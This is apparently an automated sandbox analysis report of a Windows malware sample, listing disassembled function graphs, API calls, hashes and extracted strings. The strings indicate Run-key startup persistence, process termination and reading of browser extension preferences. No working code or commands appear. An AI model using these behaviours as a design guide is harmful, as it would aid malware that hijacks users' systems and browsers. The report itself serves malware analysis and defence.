                                                                                                                                                                                                                                                                                          control_flow_graph 7371 7ff643f7e170-7ff643f7e1e3 call 7ff643f7dd54 7374 7ff643f7e1fd-7ff643f7e207 call 7ff643f7c6e4 7371->7374 7375 7ff643f7e1e5-7ff643f7e1ee call 7ff643f71654 7371->7375 7381 7ff643f7e209-7ff643f7e220 call 7ff643f71654 call 7ff643f71674 7374->7381 7382 7ff643f7e222-7ff643f7e28b CreateFileW 7374->7382 7380 7ff643f7e1f1-7ff643f7e1f8 call 7ff643f71674 7375->7380 7394 7ff643f7e53e-7ff643f7e55e 7380->7394 7381->7380 7385 7ff643f7e28d-7ff643f7e293 7382->7385 7386 7ff643f7e308-7ff643f7e313 GetFileType 7382->7386 7391 7ff643f7e2d5-7ff643f7e303 GetLastError call 7ff643f715e8 7385->7391 7392 7ff643f7e295-7ff643f7e299 7385->7392 7388 7ff643f7e366-7ff643f7e36d 7386->7388 7389 7ff643f7e315-7ff643f7e350 GetLastError call 7ff643f715e8 CloseHandle 7386->7389 7397 7ff643f7e375-7ff643f7e378 7388->7397 7398 7ff643f7e36f-7ff643f7e373 7388->7398 7389->7380 7405 7ff643f7e356-7ff643f7e361 call 7ff643f71674 7389->7405 7391->7380 7392->7391 7399 7ff643f7e29b-7ff643f7e2d3 CreateFileW 7392->7399 7403 7ff643f7e37e-7ff643f7e3d3 call 7ff643f7c5fc 7397->7403 7404 7ff643f7e37a 7397->7404 7398->7403 7399->7386 7399->7391 7409 7ff643f7e3d5-7ff643f7e3e1 call 7ff643f7df5c 7403->7409 7410 7ff643f7e3f2-7ff643f7e423 call 7ff643f7dad4 7403->7410 7404->7403 7405->7380 7409->7410 7416 7ff643f7e3e3 7409->7416 7417 7ff643f7e429-7ff643f7e46b 7410->7417 7418 7ff643f7e425-7ff643f7e427 7410->7418 7419 7ff643f7e3e5-7ff643f7e3ed call 7ff643f784b8 7416->7419 7420 7ff643f7e48d-7ff643f7e498 7417->7420 7421 7ff643f7e46d-7ff643f7e471 7417->7421 7418->7419 7419->7394 7424 7ff643f7e53c 7420->7424 7425 7ff643f7e49e-7ff643f7e4a2 7420->7425 7421->7420 7423 7ff643f7e473-7ff643f7e488 7421->7423 7423->7420 7424->7394 7425->7424 7426 7ff643f7e4a8-7ff643f7e4ed CloseHandle CreateFileW 7425->7426 7428 7ff643f7e522-7ff643f7e537 7426->7428 7429 7ff643f7e4ef-7ff643f7e51d GetLastError call 7ff643f715e8 call 7ff643f7c824 7426->7429 7428->7424 7429->7428
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                                                                                                                                          • Instruction ID: 9c46849c12c750c965115a3def23792a6fb97571b558704a85b75fc05ad0b371
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75C1C136B28A4285EB90FF68C4926AC7761FB59B98F011236DE1EA73D5DF38E055D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D572
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F7CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7CA44
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D583
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F7C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7C9E4
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D594
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F7CA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7CA14
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F78340: RtlFreeHeap.NTDLL(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78356
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F78340: GetLastError.KERNEL32(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78360
                                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF643F7D7D4), ref: 00007FF643F7D5BB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                                          • Opcode ID: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
                                                                                                                                                                                                                                                                                          • Instruction ID: 37ea61798b2952612050291d87474235676dbaa67a332eca4694c4f5a9c3ae84
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C519F72A0C64286F3A0FF25D8925A97760BB88784F804136EE4DE7BD6DF3CE4419740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                                                          • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                                                          • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                                                          • Opcode ID: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                                                                                                                                          • Instruction ID: 0836a428024dc9c9729ad91864816e67e34739cdc363cafdf21d73ac80693006
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD01D272B0C78282E791AF12F4517BA67A1FB94794F048035EA4997BD9CF3CD501CB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: 1$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                                                                                                                                          • API String ID: 1745604696-621175605
                                                                                                                                                                                                                                                                                          • Opcode ID: 399117e4ada8f37826c2442cce25861bf031eae4663afd2a448d856ce16d2512
                                                                                                                                                                                                                                                                                          • Instruction ID: 0e21b0e75a52f83d0bec8e5c7d973da5622d5a6eee905a6b77fb32c9bbfab455
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 399117e4ada8f37826c2442cce25861bf031eae4663afd2a448d856ce16d2512
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92D1C762E1CBC2C1EAA0BB15E5423BE6361FB857A4F105631DAACA36D5DF7DE480D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                                                                                                                                          • String ID: File parse failed$\Extensions$\Preferences$\Secure Preferences$developer_mode$extensions$name$pinned_extensions$profile
                                                                                                                                                                                                                                                                                          • API String ID: 2697701713-219585183
                                                                                                                                                                                                                                                                                          • Opcode ID: 94e3588e4d620914e7689faac4ce99a83f9a6a5d6724d37955c1855788994bc9
                                                                                                                                                                                                                                                                                          • Instruction ID: 6e75ac9c4e4afd2ff7c6082e61ceac5a29402281482420278f70d8b94c46b611
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94e3588e4d620914e7689faac4ce99a83f9a6a5d6724d37955c1855788994bc9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6327362A1CBC281EAB0FB14E4523EA6365FBC1744F804136D68DA7ADAEF7DD544DB00

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 6880 7ff643f33a10-7ff643f33a62 RegOpenKeyExA 6881 7ff643f33a68-7ff643f33a8e 6880->6881 6882 7ff643f33b02-7ff643f33b0c 6880->6882 6883 7ff643f33a90-7ff643f33a97 6881->6883 6884 7ff643f33b11-7ff643f33b19 6882->6884 6885 7ff643f33b0e 6882->6885 6883->6883 6886 7ff643f33a99-7ff643f33aac call 7ff643f444a0 6883->6886 6887 7ff643f33b1b 6884->6887 6888 7ff643f33b1e-7ff643f33b4b RegSetValueExA RegCloseKey 6884->6888 6885->6884 6900 7ff643f33ae0-7ff643f33b01 call 7ff643f62770 6886->6900 6901 7ff643f33aae-7ff643f33ac0 6886->6901 6887->6888 6889 7ff643f33c50-7ff643f33c6c 6888->6889 6890 7ff643f33b51-7ff643f33b66 6888->6890 6894 7ff643f33c73-7ff643f33c7a 6889->6894 6892 7ff643f33cd9-7ff643f33cdf call 7ff643f22410 6890->6892 6893 7ff643f33b6c-7ff643f33b71 6890->6893 6896 7ff643f33b76-7ff643f33bd6 call 7ff643f460e0 call 7ff643f408c0 6893->6896 6897 7ff643f33b73 6893->6897 6894->6894 6899 7ff643f33c7c-7ff643f33c8f call 7ff643f444a0 6894->6899 6919 7ff643f33bd8-7ff643f33bea 6896->6919 6920 7ff643f33c0b-7ff643f33c14 6896->6920 6897->6896 6899->6900 6915 7ff643f33c95-7ff643f33ca7 6899->6915 6905 7ff643f33adb call 7ff643f62790 6901->6905 6906 7ff643f33ac2-7ff643f33ad5 6901->6906 6905->6900 6906->6905 6910 7ff643f33cd3-7ff643f33cd8 call 7ff643f6cd30 6906->6910 6910->6892 6915->6905 6918 7ff643f33cad-7ff643f33cc0 6915->6918 6918->6910 6921 7ff643f33cc2 6918->6921 6922 7ff643f33bec-7ff643f33bff 6919->6922 6923 7ff643f33c05-7ff643f33c0a call 7ff643f62790 6919->6923 6920->6900 6924 7ff643f33c1a-7ff643f33c2c 6920->6924 6921->6905 6922->6923 6925 7ff643f33cc7-7ff643f33ccc call 7ff643f6cd30 6922->6925 6923->6920 6924->6905 6927 7ff643f33c32-7ff643f33c45 6924->6927 6928 7ff643f33ccd-7ff643f33cd2 call 7ff643f6cd30 6925->6928 6927->6928 6929 7ff643f33c4b 6927->6929 6928->6910 6929->6905
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue
                                                                                                                                                                                                                                                                                          • String ID: ' to startup.$Error adding startup program: $Error opening registry key: $Software\Microsoft\Windows\CurrentVersion\Run$Successfully added '
                                                                                                                                                                                                                                                                                          • API String ID: 31251203-1688488963
                                                                                                                                                                                                                                                                                          • Opcode ID: b703b02646074489869ecfbf97e9363cdb7401458bef78d5369863472edcd9e6
                                                                                                                                                                                                                                                                                          • Instruction ID: 5d558b4a38a4610cfc644158ad49acc1c7547fc2c686369d58a0d786a20c4484
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b703b02646074489869ecfbf97e9363cdb7401458bef78d5369863472edcd9e6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97719362B1CA8141EA50FB65E44636D6361EB857F4F105332E6BDA3BE9DF3CE481A700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Process$Enum$BaseCloseHandleModuleModulesNameOpenProcessesTerminate
                                                                                                                                                                                                                                                                                          • String ID: Failed to enumerate processes$Failed to terminate process: $Successfully terminated process:
                                                                                                                                                                                                                                                                                          • API String ID: 3307072288-2317428871
                                                                                                                                                                                                                                                                                          • Opcode ID: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                                                                                                                                          • Instruction ID: 3257c850f6cbaa6de6e49d6e551c6606c770cdae9c50923ff559a6bf4a298971
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D515471A0CA8681EAA0BF11E4422FA6361FF957C4F444135DA9DA3BE9EF7CD149D700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 6976 7ff643f5e7c8-7ff643f5e811 call 7ff643f5e770 6979 7ff643f5e813 6976->6979 6980 7ff643f5e84e-7ff643f5e851 6976->6980 6981 7ff643f5e816-7ff643f5e83a SetFileInformationByHandle 6979->6981 6982 7ff643f5e9bb-7ff643f5e9c2 6980->6982 6983 7ff643f5e857-7ff643f5e871 call 7ff643f5e770 6980->6983 6984 7ff643f5e83c-7ff643f5e840 6981->6984 6985 7ff643f5e8b8-7ff643f5e8c3 GetLastError 6981->6985 6987 7ff643f5e9d3 6982->6987 6988 7ff643f5e9c4-7ff643f5e9c7 6982->6988 6983->6981 7000 7ff643f5e873-7ff643f5e882 6983->7000 6992 7ff643f5e843-7ff643f5e847 6984->6992 6990 7ff643f5e8db-7ff643f5e8e5 call 7ff643f5e03c 6985->6990 6991 7ff643f5e8c5-7ff643f5e8c8 6985->6991 6989 7ff643f5e9d5 6987->6989 6988->6987 6994 7ff643f5e9c9-7ff643f5e9cc 6988->6994 7002 7ff643f5e9dd-7ff643f5e9e2 call 7ff643f71774 6989->7002 6990->6984 7009 7ff643f5e8eb-7ff643f5e8ee 6990->7009 6991->6990 6996 7ff643f5e8ca-7ff643f5e8cd 6991->6996 6998 7ff643f5e849-7ff643f5e84c 6992->6998 6999 7ff643f5e892-7ff643f5e8b7 call 7ff643f62770 6992->6999 6994->6987 6995 7ff643f5e9ce-7ff643f5e9d1 6994->6995 6995->6987 6995->6989 6996->6990 7003 7ff643f5e8cf 6996->7003 7005 7ff643f5e884-7ff643f5e88c CloseHandle 6998->7005 7000->6999 7000->7005 7012 7ff643f5e9e3-7ff643f5e9eb call 7ff643f71774 7002->7012 7008 7ff643f5e8d3-7ff643f5e8d6 7003->7008 7005->6999 7005->7002 7008->6992 7009->7003 7011 7ff643f5e8f0-7ff643f5e8f3 7009->7011 7011->7003 7013 7ff643f5e8f5-7ff643f5e90c GetFileInformationByHandleEx 7011->7013 7015 7ff643f5e93b-7ff643f5e940 7013->7015 7016 7ff643f5e90e 7013->7016 7017 7ff643f5e942-7ff643f5e95c SetFileInformationByHandle 7015->7017 7018 7ff643f5e9b5-7ff643f5e9b9 7015->7018 7020 7ff643f5e912-7ff643f5e918 GetLastError 7016->7020 7017->7016 7021 7ff643f5e95e-7ff643f5e968 call 7ff643f5e03c 7017->7021 7022 7ff643f5e99a-7ff643f5e9a1 7018->7022 7023 7ff643f5e91b-7ff643f5e91f 7020->7023 7028 7ff643f5e96a-7ff643f5e971 7021->7028 7029 7ff643f5e973-7ff643f5e976 7021->7029 7022->7023 7023->6999 7024 7ff643f5e925-7ff643f5e930 CloseHandle 7023->7024 7024->7012 7026 7ff643f5e936 7024->7026 7026->6999 7028->7023 7030 7ff643f5e9a6-7ff643f5e9b0 GetLastError 7029->7030 7031 7ff643f5e978-7ff643f5e994 SetFileInformationByHandle 7029->7031 7030->7008 7031->7020 7031->7022
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2221425841-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                                                                                                                                          • Instruction ID: ba83cfd313b3fc184c7e520f8bcbf51aee0e3f4bd770293b7ac64cc68a0322de
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA51D322F0C24288F7E4BB7198022FD2BA0AF657A4F148235CD5EF7AD6DF28E0059740

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 7070 7ff643f2a810-7ff643f2a86e 7071 7ff643f2a870 7070->7071 7072 7ff643f2a873-7ff643f2a8ce call 7ff643f5e0b4 call 7ff643f23ab0 call 7ff643f417c0 7070->7072 7071->7072 7078 7ff643f2a8d3-7ff643f2a8d5 7072->7078 7079 7ff643f2ac76-7ff643f2ac89 call 7ff643f24d50 7078->7079 7080 7ff643f2a8db-7ff643f2a8e4 7078->7080 7089 7ff643f2ac8a-7ff643f2ac8f call 7ff643f6cd30 7079->7089 7082 7ff643f2a8e6-7ff643f2a8fd 7080->7082 7083 7ff643f2a91d-7ff643f2a933 7080->7083 7085 7ff643f2a918 call 7ff643f62790 7082->7085 7086 7ff643f2a8ff-7ff643f2a912 7082->7086 7087 7ff643f2a941-7ff643f2a955 7083->7087 7088 7ff643f2a935-7ff643f2a939 7083->7088 7085->7083 7086->7085 7086->7089 7091 7ff643f2a957-7ff643f2a95b 7087->7091 7092 7ff643f2a963-7ff643f2a978 7087->7092 7088->7087 7102 7ff643f2ac90-7ff643f2ac9f call 7ff643f24d50 7089->7102 7091->7092 7094 7ff643f2a97a-7ff643f2a985 7092->7094 7095 7ff643f2a9bf-7ff643f2a9c7 7092->7095 7098 7ff643f2a9b7 7094->7098 7099 7ff643f2a987-7ff643f2a9a2 7094->7099 7096 7ff643f2a9d0-7ff643f2a9db 7095->7096 7100 7ff643f2a9e1-7ff643f2aa08 call 7ff643f255a0 7096->7100 7101 7ff643f2abb5-7ff643f2abc0 7096->7101 7098->7095 7099->7098 7114 7ff643f2a9a4-7ff643f2a9b5 7099->7114 7116 7ff643f2aa18-7ff643f2aa1b 7100->7116 7117 7ff643f2aa0a-7ff643f2aa12 7100->7117 7105 7ff643f2ac02-7ff643f2ac05 7101->7105 7106 7ff643f2abc2-7ff643f2abcd 7101->7106 7118 7ff643f2aca0-7ff643f2aca5 call 7ff643f6cd30 7102->7118 7108 7ff643f2ac07-7ff643f2ac12 7105->7108 7109 7ff643f2ac3f-7ff643f2ac75 call 7ff643f62770 7105->7109 7112 7ff643f2abfa 7106->7112 7113 7ff643f2abcf-7ff643f2abea 7106->7113 7108->7109 7115 7ff643f2ac14-7ff643f2ac2e 7108->7115 7112->7105 7113->7112 7126 7ff643f2abec-7ff643f2abf4 7113->7126 7114->7095 7115->7109 7134 7ff643f2ac30-7ff643f2ac3e 7115->7134 7121 7ff643f2ab9b-7ff643f2abaa call 7ff643f24f80 7116->7121 7122 7ff643f2aa21-7ff643f2aa29 7116->7122 7117->7102 7117->7116 7136 7ff643f2aca6-7ff643f2acab call 7ff643f6cd30 7118->7136 7137 7ff643f2acac-7ff643f2acd2 call 7ff643f24c60 7121->7137 7138 7ff643f2abb0 7121->7138 7129 7ff643f2aa2b 7122->7129 7130 7ff643f2aa2e-7ff643f2aa44 call 7ff643f23c20 7122->7130 7126->7112 7129->7130 7142 7ff643f2aa46-7ff643f2aa4d 7130->7142 7143 7ff643f2aa7e-7ff643f2aac3 call 7ff643f44160 call 7ff643f23f60 7130->7143 7134->7109 7136->7137 7151 7ff643f2acd7-7ff643f2ace0 7137->7151 7152 7ff643f2acd4 7137->7152 7138->7096 7148 7ff643f2aa4f-7ff643f2aa53 7142->7148 7149 7ff643f2aa55-7ff643f2aa5c 7142->7149 7164 7ff643f2aaf7-7ff643f2ab02 call 7ff643f47d80 7143->7164 7165 7ff643f2aac5-7ff643f2aaf5 7143->7165 7148->7149 7150 7ff643f2aa5e-7ff643f2aa61 7148->7150 7149->7142 7149->7150 7150->7143 7154 7ff643f2aa63-7ff643f2aa6e 7150->7154 7155 7ff643f2ad30-7ff643f2ad41 7151->7155 7156 7ff643f2ace2-7ff643f2acf4 7151->7156 7152->7151 7154->7143 7158 7ff643f2aa70-7ff643f2aa74 7154->7158 7159 7ff643f2acf7-7ff643f2acfa 7156->7159 7158->7143 7161 7ff643f2aa76-7ff643f2aa7c 7158->7161 7162 7ff643f2acfc-7ff643f2ad13 call 7ff643f89d90 7159->7162 7163 7ff643f2ad15-7ff643f2ad18 7159->7163 7161->7143 7161->7154 7162->7163 7175 7ff643f2ad1f-7ff643f2ad2f 7162->7175 7163->7155 7168 7ff643f2ad1a-7ff643f2ad1d 7163->7168 7169 7ff643f2ab03-7ff643f2ab0f 7164->7169 7165->7169 7168->7159 